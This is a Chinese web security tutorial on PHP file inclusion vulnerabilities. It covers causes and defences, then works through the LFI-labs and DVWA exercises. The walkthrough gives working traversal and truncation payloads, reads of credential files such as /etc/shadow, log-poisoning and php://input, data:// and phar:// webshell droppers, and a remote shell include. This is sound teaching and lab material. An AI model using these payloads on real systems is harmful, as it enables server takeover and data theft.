[Web安全 网络安全]-文件包含漏洞

news2024/11/15 15:46:13

文章目录:

一:前言

1.什么是文件包含漏洞

2.文件包含漏洞的成因

3.文件包含漏洞的分类

4.文件包含漏洞的防御策略

5.文件包含函数(触发点Sink)

6.环境 

6.1 靶场

6.2 其他工具 

二:文件包含LFI labs靶场实验

LFI-1

LFI-2

LFI-3

LFI-4

LFI-5

LFI-6

LFI-7-14

三:文件包含漏洞的-利用方式

1.本地文件方式利用 

1.1 包含日志文件获取webshell

1.2 利用file协议

1.3 php_filter命令获取flag

1.4 php_ zip命令压缩协议获取webshell

1.5 phar://协议

2.远程文件方式利用 

2.1 包含远程文件

2.2 php_input命令执行及获取webshell

2.3 php_data命令获取webshell

四:文件包含漏洞的-绕过方式

1.本地文件绕过方式绕过

%00截断

路径长度截断/操作系统特性进行文件包含绕过(.   ,/)

2.远程文件绕过方式绕过(?%23 %20 )


一:前言

1.什么是文件包含漏洞

定义:文件包含漏洞(File Inclusion Vulnerability)通常出现在动态网页中
     它允许攻击者在应用程序中任意包含本地或远程文件,从而导致敏感信息泄露、远程命令执行甚至完全控制目标系统
     为了更好地使用代码的重用性,引入了文件包含函数,可以通过文件包含函数将文件包含进来直接使用包含文件的代码

     简单来说:开发人员将需要重复的函数写入一个文件,对该文件进行包含时产生的操作


目的:提高代码的重复利用率、减少代码冗余、降低代码后期维护难度

2.文件包含漏洞的成因

文件包含漏洞的成因:文件包含漏洞出现在PHP语言中,在未正确进行输入验证和过滤的用户提供的输入情况下
    在包含文件时候,为了灵活包含文件,将被包含文件设置为变量,通过动态变量来引入需要包含的文件时
    用户可以对变量的值可控而服务器端未对变量值进行合理地校验或者校验被绕过,这样就导致了文件包含漏洞

    简单来说:加载的参数没有经过过滤或严格定义,可以被用户控制,,包含其他恶意文件导致执行非预期代码

     <?php 
        $file=$_GET['filename'];
        include($filename);
        //...
     ?>

    http://xxx/xxx.php?filename=show.php
    改变filename值即可改变代码中含有的文件

3.文件包含漏洞的分类

文件包含的内容只要符合php语法:都能被当成php代码进行解析,无关后缀名是什么 

文件包含漏洞的分类
    本地文件包含(Local File Inclusion, LFI):当被包含的文件位于服务器本地时,就形成了本地文件包含漏洞
        攻击者可以利用这个漏洞读取服务器上的敏感文件,如配置文件、数据库文件等,甚至执行服务器上的恶意脚本
        
        例子:http://localhost/filename/?page=c:/windows/win.ini


    远程文件包含(Remote File Inclusion, RFI):当被包含的文件位于第三方服务器时,就形成了远程文件包含漏洞
        这种漏洞允许攻击者包含并执行远程服务器上的恶意脚本url文件,从而对目标系统造成更大的威胁
        但需要注意的是,远程文件包含漏洞的利用通常需要服务器配置中的allow_url_include选项被开启

        php.ini中设置:php.ini中设置allow url fopen =On(默认)、allow url include= On(php5.2后默认为Off)
            allow_url_fopen:为ON时,能读取远程文件,默认;例如file_get_contents()就能读远程文件
            Alow_url_include:为ON时,就可使用include和require等方式包含远程文件

        例子:http://localhost/filename/?page=../../../phpinfo.php
        例子:http://localhost/filename/?page=phpinfo.txx
              phpinfo.txt    <?php phpinfo();?>
        

4.文件包含漏洞的防御策略

文件包含漏洞的防御策略
    过滤危险字符:使用如str_replace等方法过滤掉用户输入中的危险字符

    配置open_basedir:通过配置php.ini中的open_basedir指令,限制PHP能够打开的文件目录,防止目录遍历

    使用安全的文件包含函数:推荐使用include_once()和require_once()函数来包含文件,这些函数可以防止文件被包含多次

    验证用户输入:在包含文件之前,验证用户输入是否是有效的,防止攻击者通过提交恶意文件来触发文件包含漏洞

    使用白名单:对于动态包含的文件,可以设置一个白名单,只包含白名单中的文件

    做好权限管理:确保文件和目录的权限设置合理,防止非授权用户访问敏感文件

    使用Web应用程序防火墙(WAF):WAF可以阻止攻击者利用文件包含漏洞进行恶意攻击

    过滤.(点)/(反斜杠)\(反斜杠)

    禁止服务器远程文件包含

    尽量不要使用动态包含,可以在需要包含的页面固定写好

5.文件包含函数(触发点Sink

require组require函数出现错误,会直接报错并退出程序执行
require_once函数出现错误,会直接报错并退出程序执行;仅包含一次
include组include函数出现错误,会抛出一个警告,程序继续执行
include_once函数出现错误,会抛出一个警告,程序继续执行;仅包含一次

代码审计时间用 

Include:如果包含的文件有错误/路径有错误,会继续执行,不会影响整个程序;  有返回值
         如果指定的文件不存在,PHP会发出一个警告(E_WARNING),但脚本会继续执行
         include 可以在脚本的任意位置使用,以引入需要的功能代码

Include_once:只包含一次


require:如果包含的文件有错误/路径有错误,会继续执行,  会影响整个程序;没有返回值
    如果指定的文件不存在,PHP会发出一个致命错误(E_COMPILE_ERROR),并停止脚本的执行。
    这通常用于那些缺少了就无法继续执行的文件

require once:与 require 类似,但它在引入文件之前会检查该文件是否已经被引入过,以避免重复引入


highlight_file():用于输出文件并语法高亮显示
        这对于查看PHP源代码特别有用,因为它会以HTML格式显示文件内容,并尝试对PHP代码进行语法高亮

show_source():与 highlight_file() 类似,但它直接输出或返回文件的源代码,而不是通过浏览器显示
        它同样尝试对PHP代码进行语法高亮

readfile():将整个文件读入一个字符串,并将文件内容输出,这个函数主要用于直接输出文件到浏览器或客户端

file_get_contents():将整个文件读入一个字符串
    与 readfile() 不同,file_get_contents() 不会直接输出文件内容,而是将内容存储在变量中,供后续处理

fopen():用于打开文件或URL
         返回一个文件指针资源,之后可以使用其他文件操作函数(如 fread()、fwrite()、fclose() 等)对文件进行读写操作

file(): 将整个文件读入一个数组中,每个元素都是文件的一行。这对于逐行处理文件内容非常方便

6.环境 

6.1 靶场

LFI labs:lfi-labs、lfi-labs-master镜像地址 

Bugku CTF:由乌云知识库(wooyun.org)推出的在线漏洞靶场

pikachu:带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞

DVWA:是一个PHP/MySQL Web应用程序,包含常见漏洞,用于安全培训和练习,可参考

6.2 其他工具 

phpSdudy

burp

中国菜刀

二:文件包含LFI labs靶场实验

绕过方式不带后缀绕过
%00截断
加点.绕过
加斜杠点/.绕过
深入目录../../绕过
双写../绕过 或者  ../替换空格绕过
phpinfo.php
    <?php phpinfo(); ?>


webshell.php    {eval() 函数把字符串按照 PHP 代码来计算}
    <?php @eval($_POST([margin])); ?>    

LFI-1

Load URL地址:http://www.lfi.com/LFI-1/


后台代码
    <?php 
        include($_GET["page"]); 
    ?>


获取系统敏感文件
    http://www.lfi.com/LFI-1/?page=c:\\boot.ini


获取webshell    
    http://www.lfi.com/LFI-1/?page=phpinfo.php
    http://www.lfi.com/LFI-1/?page=phpinfo.jpg
    http://www.lfi.com/LFI-1/?page=phpinfo.txt
    http://www.lfi.com/LFI-1/?page=../webshell.php

LFI-2

Load URL地址:http://www.lfi.com/LFI-2/


后台代码
    <?php 
        include("includes/".$_GET['library'].".php"); 
    ?>


获取系统敏感文件
    http://www.lfi.com/LFI-2/?library=c://boot.ini
        include("includes/c://boot.ini.php"); 

    绝对路径
    http://www.lfi.com/LFI-2/?library=c://boot.ini%00            %00截断
        include("includes/c://boot.ini%00.php"); 
        include("includes/c://boot.ini   .php"); 

    相对路径
    http://www.lfi.com/LFI-2/?library=../boot.ini%00            
    http://www.lfi.com/LFI-2/?library=../../boot.ini%00            
    http://www.lfi.com/LFI-2/?library=../../../boot.ini%00            
        include("includes/../../../boot.ini%00.php"); 
        include("includes/../../../boot.ini   .php"); 

    http://www.lfi.com/LFI-2/?library=../../../phpinfo.php%00      
    

获取webshell
    http://www.lfi.com/LFI-2/?library=../../../webshell.php%00  

LFI-3

Load URL地址:http://www.lfi.com/LFI-3/


后台代码
    <?php 
        if(substr($_GET['file'],-4,4)!= '.php')                    //从结尾倒数第四个开始,取4个长度
            echo file_get_contents($_GET['file']);
        else
            echo 'you are not allowed to see source files'."\n";
    ?>


获取系统敏感文件
    http://www.lfi.com/LFI-3/?file=c://boot.ini                     可以查看

    http://www.lfi.com/LFI-3/?file=../phpinfo.ini                   不可以查看
        http://www.lfi.com/LFI-3/?file=../phpinfo.ini%00            没有提示
        http://www.lfi.com/LFI-3/?file=../../../../phpinfo.ini%00   还是不可以

        http://www.lfi.com/LFI-3/?file=../../phpinfo.php.           加点.绕过
        http://www.lfi.com/LFI-3/?file=../../phpinfo.php/.          加斜杠点/.绕过
        http://www.lfi.com/LFI-3/?file=../../phpinfo.php%00         利用burp工具抓包%00截断

LFI-4

Load URL地址:http://www.lfi.com/LFI-4/


后台代码
    //---------------------------------------------------------------------------------//
    addslashes()函数:返回在预定义字符之前添加反斜杠的字符串    在他们{'  "  \  NULL}之前添加\
        如果用%00截断,他们的区别
            ../../../../../phpinfo.php
            ../../../../../phpinfo.php\0        
    //---------------------------------------------------------------------------------//
    <?php 
        $path = "includes/class_'.addslashes($_GET(['class'])).'.php ";
        echo file_get_contents($path);
    ?>


获取系统敏感文件
    http://www.lfi.com/LFI-4/?class=../phpinfo                    不可以查看
    http://www.lfi.com/LFI-4/?class=../../../../../phpinfo        可以查看(深入目录../../绕过)


    如果$path = "includes/class_'.($_GET(['class'])).'.php ";
        http://www.lfi.com/LFI-4/?class=../../../../../phpinfo%00 也可以查看

LFI-5

Load URL地址:http://www.lfi.com/LFI-5/


后台代码
    <?php 
        $file=str_replace('../','',$_GET('file'));
        if(isset($file))
            include("page/$file");
        else
            include("index.php");
    ?>


获取系统敏感文件
    http://www.lfi.com/LFI-5/?file=c://boot.ini                   不可以查看
    http://www.lfi.com/LFI-5/?file=../../phpinfo.php              不可以查看
    http://www.lfi.com/LFI-5/?class=..././..././../phpinfo.info   可以查看(双写../绕过 或者 ../替换空格绕过)

LFI-6

Load URL地址:http://www.lfi.com/LFI-6/


后台代码
    <?php 
       include($_POST["page"]);
    ?>


获取系统敏感文件
    http://www.lfi.com/LFI-6/?page=c://boot.ini                   可以查看
    http://www.lfi.com/LFI-6/?page=../../phpinfo.php              可以查看
  

    获取webshell:但是POST文件包含无法直接获取,需要加工一下(文件包含写shell)
        第一步:image.jpg在图片里面写入:小马
        <?php fputs(fopen("shell.php","w"), '<?php eval($_POST[shell])?>'); ?>

        第二步:勾选enable post data,执行会生成一个shell.php
            http://www.lfi.com/LFI-6/?page=../../image.php       
       
        第三步:访问查看
            http://www.lfi.com/LFI-6/?page=../../shell.php        可以查看

LFI-7-14

第七题
    POST方式提交1ibrary=../../../phpinfo.php%00                            %00截断
    或者        1ibrary=../../../phpinfo                                   不带后缀


第八题
    POST提交http://www.lfi.com/LFI-3/?file=../../phpinfo.php%00             %00截断    
    或者                                         phpinfo.php/.              /.绕过


第九题
    POST提交class=../../../../../phpinfo                                   不带后缀
第十题
    POST提交fi1e=..././..././..././phpinfo.php                             双写../替换为空


第十一题
    POST:stylepath=../../phpinfo.php      hidden隐藏的输入框               两个参数(分别试一试)
第十二题
    GET :stylepath=../../phpino.php       hidden隐藏的输入框               两个参数(分别试一试)


第十三题
    GET 方式:fi1e=..././..././..././phpinfo.php                            双写../替换为空
十四题
    POST方式:file=..././..././..././phpinfo.php                            双写../替换为空

三:文件包含漏洞的-利用方式

                                                                                                PHP支持的协议和封装协议

file://访问本地文件系统
http://访问HTTP(s)网址
fpt://访问FPT(s) URLs
php://访问各个输入/输出流(I/O  streams)
zlib://压缩流
data://数据(RFC 2397)
glob://查找匹配的文件路径模式
phar://PHP文档
ssh2://Secure Shell 2
rar://RAR
ogg://音频流
expect://处理交互式的流

文件包含漏洞的利用方式
    直接包含恶意文件:攻击者可以通过URL参数直接指定恶意文件的路径,使应用程序包含并执行该文件

    利用伪协议:如php://filter、data://等,这些伪协议允许攻击者控制输入流,将恶意代码作为输入流传递给应用程序
        php://filter 是一种元封装器 ,设计用于数据流打开时的筛选过滤应用
        data:// 同样类似与php://input,可以让用户来控制输入流
        php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行
        phar://xxx.png/shell.php 解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压

    包含日志文件:通过包含服务器的日志文件(如Apache的access.log或error.log)来执行日志中的恶意代码

    包含session

    00截断

    长度截断(Windows:256;Linux:4096)

1.本地文件方式利用 

1.1 包含日志文件获取webshell

                                                                                                日志默认路径
apache+Linux日志默认路径/etc/httpd/logs/access_log
/var/log/httpd/access_log
apache+win2003日志默认路径D:\xampp\apache\logs\access.log
D:\xamppiapache\logs\error.log
IIS6.0+win2003默认日志文件C:WINDOUS\system32\Logfiles
IIS7.0+win2003 默认日志文件%SystemDrives%\inetpub\logs\LogFiles
nginx日志文件日志文件在用户安装目录logs目录下
以我的安装路径为例/usr/local/nginx
那我的日志目录就是在/usr/local/nginx/logs里
                                                                                        敏感文件默认路径列举
windows系统C:\boot.ini查看系统版本
C:\windows\system32\inetsrvMetaBase.xmliis配置文件
C:\windowslrepairlsame存储windows系统初次安装密码
C:\ProgramFilesmysqlmy.inimysql配置信息
C:\ProgramFiles\mysql\data\mysqluser.MYDmysql root密码
C:\lwindowslphp.iniphp配置信息
linux/unix系统/etc/passwd账户信息
/etc/shadow账户密码文件
/usr/local/app/apache2/conf/httpd.confApache2默认配置文件
/usr/local/app/apache2/conf/extra/httpd-vhost.conf虚拟网站配置
/usr/local/app/php5/lib/php.iniphp相关配置
/etc/httpd/conf/httpd.confapache配置信息
/etc/my.confmysql配置文件
Load URL地址:http://www.lfi.com/LFI-1/


访问日志文件
    http://www.lfi.com/LFI-1/page=c:\phpStudy\Apache\logs\datafile.log


查看一句话木马
    第一步:写入
        http://www.lfi.com/LFI-1/<?php phpinfo(); ?>

        http://www.lfi.com/LFI-1/?page=../../phpinfo.php

    第二步:查看
        http://www.lfi.com/LFI-1/page=c:\phpStudy\Apache\logs\datafile.log
        http://www.lfi.com/LFI-1/page=..\..\..\Apache\logs\datafile.log


特殊字符被url编码问题:用burp抓包 获取url页面 
    第一步:执行    http://www.lfi.com/LFI-1/

    第二步:修改    GET /LEI-1/HTTP/1.1    
           GET /LEI-1/<?php phpinfo(); ?> HTTP/1.1 

    第三步:查看
            http://www.lfi.com/LFI-1/page=c:\phpStudy\Apache\logs\datafile.log


获取一句话木马
    第一步:执行    http://www.lfi.com/LFI-1/

    第二步:修改    GET /LEI-1/HTTP/1.1    
           GET /LEI-1/<?php @eval($_POST([margin])); ?> HTTP/1.1 

    第三步:查看
           http://www.lfi.com/LFI-1/page=c:\phpStudy\Apache\logs\datafile.log

1.2 利用file协议

 php.ini中设置allow url fopen =off)、allow url include= off)

Load URL地址:http://www.lfi.com/php/?page=http:192.168.1.239/DVWA-master/valnerabilities/fi/?page=file://c:/windows/win.ini

1.3 php_filter命令获取flag

php://fi1ter 是一种元封装器,设计用于数据流打开时的筛选过滤应用
这对于一体式(all-in-one)的文件函数非常有用,类似 readfle()、fle()和 fle_get_contents(),在数据流内容读取之前没有机会应用其他过滤器


php://fi1ter参数
    resource=<要过滤的数据流>        这个参数是必须的。它指定了你要筛选过滤的数据流

    read=<读链的筛选列表>            该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔

    write=<写链的筛选列表>           该参数可选。可以设定一个或多个过滤器名称,以管道符(|)分隔

    <;两个链的筛选列表>              任何没有以 read=或 write=作前缀 的筛选器列表会视情况应用于读或写链
Load URL地址:http://www.lfi.com/php/php_filter.php


编码文件
    Load URL地址:http://www.lfi.com/php/php_filter.php?file=php://filter/read=covert.base64-encode/resource=php_filter.php

解码文件:利用burp(decode as——>base64)

读取flag.php文件——>利用burp解码
    Load URL地址:http://www.lfi.com/php/php_filter.php?file=php://filter/read=covert.base64-encode/resource=flag.php

获取flag
    http://www.lfi.com/php/php_filter.php

1.4 php_ zip命令压缩协议获取webshell

Load URL地址:http://www.lfi.com/php/php_zip.php


zip//、bzip2://、zlib//协议压缩流版本,利用条件按为php版本大于5.3.0

格式:zip://[压缩文件绝对路径]#[压缩文件内的子文件名]


获取压缩包里面的文件:backdoor.php
    http://www.lfi.com/php/php_zip.php?file=upload
    http://www.lfi.com/php/php_zip.php?file=zip://c:\phpstudy\etc.zip%23backdoor.php

1.5 phar://协议

类似于zip协议,但是可以使用相对路径

格式:phar://[压缩文件绝对/相对路径]压缩文件内的子文件名]


上传
    http://www.lfi.com/php/php_zip.php?file=phar://../../phpstudy/etc.zip/backdoor.php

    backdoor.php
        <?php fputs(fopen("shell.php","w"), '<?php eval($_POST["cmd"])?>'); ?>
        <?php phpinfo(); ?>

访问shell.php
     http://www.lfi.com/php/shell.php

2.远程文件方式利用 

2.1 包含远程文件

php.ini中设置allow url fopen =On(默认)、allow url include= On(php5.2后默认为Off) 

Load URL地址:http://www.lfi.com/php/?page=http:192.168.1.239/phpinfo.php


远程包含shell
    http://www.lfi.com/php/?page=http:192.168.1.239/DVWA-master/valnerabilities/fi/?page=http://localhost/remoteshell.txt

    remoteshell.txt
        <?php
            $payload="<?php eval(\$_POST['&cmd'])?>":
            $myfile =fopen('demo.php','w) or die("can't open the file!");
            fwrite($myfile,$payload);
            fclose($myfile);
        ?>

2.2 php_input命令执行及获取webshell

php.ini中设置allow url fopen =Off、allow url include= On

Load URL地址:http://www.lfi.com/php/page=php://input


获取phpinfo页面
    http://www.lfi.com/php/php_input.php?file=php://input <?php phpinfo();?>

获取当前操作系统目录
    http://www.lfi.com/php/php_input.php?file=php://input <?php syetem("dir");?>

获取目录里面内容:在服务器上写入小马
    http://www.lfi.com/php/php_input.php?file=php://input <?php fputs(fopen("shell.php","w"), '<?php eval($_POST[margin]);?>'); ?>

访问shell.php
    http://www.lfi.com/php/shell.php

2.3 php_data命令获取webshell

php.ini中设置allow url fopen =Off、allow url include= On 

Load URL地址:http://www.lfi.com/php/php_data.php


获取phpinfo文件页面
    http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>

    base <?php phpinfo()?>编码
    http://127.0.0,1/cmd,php?file=data://text/plain;base64.pp9waHAgcGhwaw5mbygpPz4==

    http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>
    http://127.0.0.1/cmd.php?file=data:text/plain;base64,Pb9waHagcGhwaW5mbvgpPz4

写入小马
    http://127.0.0.1/cmd.php?file=data://text/plain,<?PHP fputs(fopen("shell.php","w",'<?php eval($ posT[margin]);?>');?>
    
访问shell.php
    http://www.lfi.com/php/shell.php

四:文件包含漏洞的-绕过方式

这里可以参考之前的方法:问号、空格、注释、双写、大小写、截断等 

1.本地文件绕过方式绕过

<?php include("inc/" .$_GET['file'] . ".htm");?>

%00截断

原理:php内核由c语言实现,因此使用了c语言中的字符串处理函数,在连接字符串时0字节作为字符串的结束符  
     %00url解码为0x00,magic quotes gps开启时会将%00转义为\0的两个单体字符,故不具备截断功能


条件:magic quotes gps=off php版本<5.3.4


?page=../../../../phpinfo.php%00


%00截断目录遍历:
    条件:magic_quotes_gps=off 
    unix文件系统,比如FreeBSD,OpenBSD,NetBSD,Solaris?page=../../../../var/www/%00

路径长度截断/操作系统特性进行文件包含绕过(.   ,/)

文件名不能包含下列任何字符之一:\ / : * ? < > |  

Load URL地址:http://www.lfi.com/LFI-1/

php版本小于5.2.8


后台代码:在php5.3版本以后就不可以使用00截断
    <?php 
        include($_GET["page"]."html"); 
    ?>


解决办法
    文件后缀上有多个或单个的点,会被自动消除
    文件名大于256个字符会自动被丢弃掉


绕过办法backdoor.php(<?php phpinfo()?>)  
    http://www.lfi.com/LFI-1/?page=backdoor.php.....大于256个.    或者大于256个././././

    Windows下目录最大长度为256字节,超出的部分会被丢弃
    linux  下目录最大长度为4096字节,超出的部分会被丢弃

2.远程文件绕过方式绕过(?%23 %20 )

<?php
    $basePath =$_GET['path'];
    require_once $basePath ."/action/m_share.php";
?>


绕过方式
    http://192.168.1.239/DVWA-master/vulnerabilities/fi/?page=http://localhost/shell.php?
        代码实际执行了:require once http://localhost/shell.php?/action/m share.php
        将/action/m share.php作为http://localhost/shell.php的querystring查询字符串

    http://192.168.1.239/DVWA-master/vulnerabilities/fi/?page=http://locahost/shell.php%23

    http://192.168.1.239/DVWA-master/vulnerabilities/fi/?page=http://localhost/shell.php%20

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2127025.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

组播 2024 9 11

PIM&#xff08;Protocol Independent Multicast&#xff09;是一种常用的组播路由协议&#xff0c;其独立于底层的单播路由协议&#xff0c;能够在多种网络环境中有效地实现多播路由功能。PIM主要有两种模式&#xff1a;PIM Sparse Mode (PIM-SM) 和 PIM Dense Mode (PIM-DM)&…

sqli-labs靶场自动化利用工具——第1关

文章目录 概要整体架构流程技术细节执行效果小结 概要 Sqli-Labs靶场对于网安专业的学生或正在学习网安的朋友来说并不陌生&#xff0c;或者说已经很熟悉。那有没有朋友想过自己开发一个测试脚本能实现自动化化测试sqli-labs呢&#xff1f;可能有些人会说不是有sqlmap&#xf…

【TCP】相关机制:异常处理

文章目录 1 . **进程崩溃**2 . **主机关机**&#xff08;正常流程的关机&#xff09;3 . **主机掉电**&#xff08;直接拔电源&#xff09;1. 接收方掉电2. 发送方掉电 4 . **网线断开** 1 . 进程崩溃 Java 中的体现就是抛出异常&#xff0c;但没人 catch&#xff0c;最终异常…

Apache SeaTunnel Zeta 引擎源码解析(二) Client端的任务提交流程

作者&#xff1a;刘乃杰 编辑整理&#xff1a;曾辉 引入 本系列文章是基于 Apache SeaTunnel 2.3.6版本&#xff0c;围绕Zeta引擎给大家介绍其任务是如何从提交到运行的全流程&#xff0c;希望通过这篇文档&#xff0c;对刚刚上手SeaTunnel的朋友提供一些帮助。 我们整体的文…

如何用 Scrapy 爬取网站数据并在 Easysearch 中进行存储检索分析

做过数据分析和爬虫程序的小伙伴想必对 Scrapy 这个爬虫框架已经很熟悉了。今天给大家介绍下&#xff0c;如何基于 Scrapy 快速编写一个爬虫程序并利用 Easysearch 储存、检索、分析爬取的数据。我们以极限科技的官网 Blog 为数据源&#xff0c;做下实操演示。 安装 scrapy 使…

Linux shell编程学习笔记79:cpio命令——文件和目录归档工具(下)

在 Linux shell编程学习笔记78&#xff1a;cpio命令——文件和目录归档工具&#xff08;上&#xff09;-CSDN博客https://blog.csdn.net/Purpleendurer/article/details/142095476?spm1001.2014.3001.5501中&#xff0c;我们研究了 cpio命令 的功能、格式、选项说明 以及 cpi…

Maven下载安装

下载 下载地址&#xff1a;Maven – Download Apache Maven 选择合适的版本进行下载 windows&Linux安装 1, 解压apache-maven-3.6.1.rar即安装完成 2&#xff0c; 配置环境变量MAVEN_HOME为安装路径&#xff0c;并将MAVEN_HOME的bin目录配置到PATH下 3&#xff0c;…

黑马点评21——最佳实践-键值设计

文章目录 如何优雅的设计keyBigKey问题选择合适的数据结构 如何优雅的设计key BigKey问题 redis-rdb-tools 选择合适的数据结构 动态修改的&#xff0c;重启后就又失效了&#xff0c;而且最好上线不要超过1000 这样解决也不存在bigkey的问题了。

leetcode 1811 寻找面试候选人(postgresql)

需求 表: Contests ------------------ | Column Name | Type | ------------------ | contest_id | int | | gold_medal | int | | silver_medal | int | | bronze_medal | int | ------------------ contest_id 是该表的主键. 该表包含LeetCode竞赛的ID和该场比赛中金牌、银…

maya的重命名物体和材质工具(带ai过程)

对材质同样也有效 被AI干失业的卖衣服的小姐姐&#xff0c;开的士的小哥哥都可以再就业的易上手教程&#xff0c; 先看效果&#xff01; 对物体命名也是&#xff0c;相当的美观 先提出需求我想在maya中批量重命名物体怎么办&#xff1f;AI给你弄个短代码 &#xff0c;放进AI进…

Trying to install openai in chaquopy in android studio but getting build failed

题意&#xff1a;“尝试在 Android Studio 的 Chaquopy 中安装 OpenAI&#xff0c;但构建失败。” 问题背景&#xff1a; Pretty much title, tried to import openai in android studio to use their api for my android app but everytime I run the app I get the same bui…

SQL注入+CTF实例

SQL注入的做题步骤 1.判断数字型还是字符型 数字型&#xff1a; select * from table where id$id; 字符型&#xff1a; select * from table where id$id; # 一般是单引号闭合&#xff0c;也有可能是双引号&#xff0c;又或者是)、")、))等等都有可能 可以用and 11和an…

康谋分享 | 汽车仿真与AI的结合应用

在自动驾驶领域&#xff0c;实现高质量的虚拟传感器输出是一项关键的挑战。所有的架构和实现都会涉及来自质量、性能和功能集成等方面的需求。aiSim也不例外&#xff0c;因此我们会更加关注于多个因素的协调&#xff0c;其中&#xff0c;aiSim传感器实现的神经网络渲染仿真方案…

[001-03-007].第07节:Redis中的管道

我的后端学习大纲 我的Redis学习大纲 1、Redis管道的由来&#xff1a; 1.Redis是一种基于客户端-服务端模型以及请求/响应协议的TCP服务。一个请求会遵循以下步骤&#xff1a; 客户端向服务端发送命令分四步(发送命令→命令排队→命令执行→返回结果)&#xff0c;并监听Socket…

C++类和对象 第二级初阶

目录 面向过程和面向对象 类 类是什么&#xff1f; 类的定义 1.声明和定义都放在类中 2.声明和定义分离 类的访问限定符 类的封装 类的作用域 类的实例化 类对象存储 结构体内存对齐规则 面向过程和面向对象 c语言是面向过程的 c是面向对象的 怎么理解&#xff1f…

外包干了三年,快要废了。。。

先说一下自己的情况&#xff0c;普通本科&#xff0c;在外包干了3年多的功能测试&#xff0c;这几年因为大环境不好&#xff0c;我整个人心惊胆战的&#xff0c;怕自己卷铺盖走人了&#xff0c;我感觉自己不能够在这样蹉跎下去了&#xff0c;长时间呆在一个舒适的环境真的会让一…

【智能终端】HBuilder X 与微信开发者工具集成与调试实战

目录 1. 需求和理解库、框架、平台 1.1 需求 1.2 理解 2.3 库、框架、平台 2.3.1 库&#xff08;Library&#xff09; 2.3.2 框架&#xff08;Framework&#xff09; 2.3.3 平台&#xff08;Platform&#xff09; 2.3.4 总结 2. 使用 HBuilder X 创建第一个 uni-app 应…

MATLAB绘图基础7:单变量图形绘制

参考书&#xff1a;《 M A T L A B {\rm MATLAB} MATLAB与学术图表绘制》(关东升)。 7.单变量图形绘制 7.1 直方图 直方图 ( H i s t o g r a m ) ({\rm Histogram}) (Histogram)&#xff1a;一种常用于可视化数据分布的图形类型&#xff0c;用于显示数据集中各数值范围的频率…

STM32G474RE之RTC

STM32G474RE之RTC使用HAL库实现RTC时间配置&#xff0c;以及报警配置&#xff0c;支持双路报警。 1、STM32G474RE的RTC晶振引脚&#xff1a; OSC32_IN为PC14&#xff0c;OSC32_OUT为PC15&#xff1b; 2、Vbat引脚 Vbat引脚是用来给外部晶振LSE和备份寄存器提供电源。当没有“…

9.11 QT ( Day 4)

一、作业 1.Widget.h #ifndef WIDGET_H #define WIDGET_H#include <QWidget> #include <QTimerEvent> //定时器类 #include <QTime> #include <QtTextToSpeech> //文本转语音类QT_BEGIN_NAMESPACE namespace Ui { class Widget; } QT_END_NAMESPACEcl…